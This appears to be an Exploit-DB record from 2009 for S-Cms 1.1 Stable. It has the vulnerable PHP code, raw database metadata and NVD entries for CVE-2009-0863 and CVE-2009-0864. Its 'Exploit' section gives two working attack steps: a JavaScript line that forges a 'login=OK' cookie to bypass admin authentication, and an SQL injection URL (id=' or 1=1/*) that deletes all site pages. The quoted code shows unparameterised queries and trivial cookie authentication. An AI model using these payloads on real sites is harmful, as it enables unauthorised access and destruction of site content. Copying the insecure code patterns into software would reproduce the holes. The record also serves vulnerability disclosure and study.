ID EDB-ID:8071
Type exploitdb
Reporter x0r
Modified 2009-02-17T00:00:00
Description
S-Cms 1.1 Stable Insecure Cookie Handling / Mass Page Delete Vulns. CVE-2009-0863,CVE-2009-0864. Webapps exploit for php platform
#########################################################################################
[0x01] Informations:
Name : S-Cms 1.1 Stable
Download : http://www.hotscripts.com/listings/jump/download/87992/
Vulnerability : Insecure Cookie Handling / Mass Page Delete
Author : x0r
Contact : andry2000@hotmail.it
Notes : Proud to be Italian
#########################################################################################
[0x02] Bug:
Bugged file is /[path]/login_action.php ... /admin/delete_page.php
[Code]
$user=$_POST['username'];
$pass=$_POST['password'];
$select_admin = mysql_query("SELECT * FROM cms_admin");
while($dati_admin=mysql_fetch_array($select_admin)){
$username=$dati_admin['username'];
$password=$dati_admin['password'];
}
if ($user == $username && $pass == $password){
setcookie("login", "OK", time() + $logintime); #0wn3d
[/code]
[CODE]
$id=$_GET['id'];
$delete=mysql_query("DELETE FROM cms_content WHERE id='$id'");
if ($delete){
echo ""._DELETE_PAGE_SUCCESS."";
} else {
echo ""._DELETE_PAGE_ERROR."";
[/code]
#########################################################################################
[0x03] Exploit:
Exploit: 1- javascript:document.cookie = "login=OK; path=/"
2- http://[victim].org/path/admin/delete_page.php?id=' or 1=1/*
########################################################################################
# milw0rm.com [2009-02-17]
{"id": "EDB-ID:8071", "hash": "a8d5e93c1fc3604085e3066492ba0491", "type": "exploitdb", "bulletinFamily": "exploit", "title": "S-CMS 1.1 Stable Insecure Cookie Handling / Mass Page Delete Vulns", "description": "S-Cms 1.1 Stable Insecure Cookie Handling / Mass Page Delete Vulns. CVE-2009-0863,CVE-2009-0864. Webapps exploit for php platform", "published": "2009-02-17T00:00:00", "modified": "2009-02-17T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/8071/", "reporter": "x0r", "references": [], "cvelist": ["CVE-2009-0864", "CVE-2009-0863"], "lastseen": "2016-02-01T03:41:08", "history": [], "viewCount": 6, "enchantments": {"score": {"value": 6.5, "vector": "NONE", "modified": "2016-02-01T03:41:08"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-0863", "CVE-2009-0864"]}], "modified": "2016-02-01T03:41:08"}, "vulnersScore": 6.5}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/8071/", "sourceData": "#########################################################################################\n[0x01] Informations:\n\nName : S-Cms 1.1 Stable \nDownload : http://www.hotscripts.com/listings/jump/download/87992/\nVulnerability : Insecure Cookie Handling / Mass Page Delete\nAuthor : x0r\nContact : andry2000@hotmail.it\nNotes : Proud to be Italian \n#########################################################################################\n[0x02] Bug:\n\nBugged file is /[path]/login_action.php ... /admin/delete_page.php\n\n[Code]\n\n$user=$_POST['username'];\n$pass=$_POST['password'];\n\n$select_admin = mysql_query(\"SELECT * FROM cms_admin\");\n\nwhile($dati_admin=mysql_fetch_array($select_admin)){\n$username=$dati_admin['username'];\n$password=$dati_admin['password'];\n}\n\nif ($user == $username && $pass == $password){\n \n setcookie(\"login\", \"OK\", time() + $logintime); #0wn3d\n\n[/code]\n\n[CODE]\n\t\n\t\t$id=$_GET['id'];\n\t\t\n\t\t$delete=mysql_query(\"DELETE FROM cms_content WHERE id='$id'\");\n\t\t\n\t\t\n\t\tif ($delete){\n\t\t\n\t\techo \"\"._DELETE_PAGE_SUCCESS.\"\";\n\t\t\n\t\t} else {\n\t\t\n\t\techo \"\"._DELETE_PAGE_ERROR.\"\";\n[/code]\n\n#########################################################################################\n[0x03] Exploit:\n\nExploit: 1- javascript:document.cookie = \"login=OK; path=/\"\n 2- http://[victim].org/path/admin/delete_page.php?id=' or 1=1/*\n\n########################################################################################\n\n# milw0rm.com [2009-02-17]\n", "osvdbidlist": ["52570", "52571"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2019-05-29T18:09:57", "bulletinFamily": "NVD", "description": "SQL injection vulnerability in admin/delete_page.php in S-Cms 1.1 Stable allows remote attackers to execute arbitrary SQL commands via the id parameter.", "modified": "2017-09-29T01:34:00", "id": "CVE-2009-0863", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0863", "published": "2009-03-10T14:30:00", "title": "CVE-2009-0863", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:09:57", "bulletinFamily": "NVD", "description": "S-Cms 1.1 Stable allows remote attackers to bypass authentication and obtain administrative access via an OK value for the login cookie.", "modified": "2017-09-29T01:34:00", "id": "CVE-2009-0864", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0864", "published": "2009-03-10T14:30:00", "title": "CVE-2009-0864", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}